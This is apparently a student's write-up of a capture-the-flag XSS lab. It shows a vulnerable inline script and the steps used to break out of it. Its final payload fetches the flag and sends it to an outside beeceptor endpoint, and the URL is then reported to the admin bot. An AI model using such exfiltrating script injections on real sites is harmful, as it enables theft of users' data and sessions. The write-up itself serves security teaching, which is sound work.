Simple Web 0x11(Lab - XSS Me)

tags: NTUSTWS CTF Web

Challenge: http://h4ck3r.quest:8800/

Background

:::spoiler 攻擊者沒有直接攻擊受害者，而是把惡意程式植入到受害者會瀏覽的網頁，當受害者瀏覽該網頁時，就會自動執行惡意程式，並把受害主機的一些資料送回給駭客(這是其中一種受害方式，也可能很直接的被盜取COOKIE之類的)

:::

Source code

...
<script>
    const message = {"icon": "error", "titleText": "User not found.", "timer": 3000, "showConfirmButton": false, "timerProgressBar": true};
    window.onload = function () {
        if (message !== null) Swal.fire(message);
    }
</script>
...

Exploit

1. Check XSS

    ...
    <script>
        const message = {"icon": "error", "titleText": "youshallnotpass", "timer": 3000, "showConfirmButton": false, "timerProgressBar": true};
        window.onload = function () {
            if (message !== null) Swal.fire(message);
        }
    </script>
    ...
   

   

2. Try to inject script tag Payload: http://h4ck3r.quest:8800/?type=error&message=%3C/script%3E%3Cscript%3Ealert(123)%3C/script%3E//

    ...
    <script>
        const message = {"icon": "error", "titleText": "</script><script>alert(123)</script>//", "timer": 3000, "showConfirmButton": false, "timerProgressBar": true};
        window.onload = function () {
            if (message !== null) Swal.fire(message);
        }
    </script>
   

   

   • Hint If you login as guest(password = guest), then you can get the response
3. Fetch flag and send to beeceptor Payload:

    http://h4ck3r.quest:8800/?message=%3C/script%3E%3Cscript%3Efetch(`/getflag\).then(r=%3Er.text()).then(flag=%3Elocation.href=`https://sbk6401.free.beeceptor.com/?f=${flag}`)%3C/script%3E//
   

4. Report to admin. Then you got flag!!!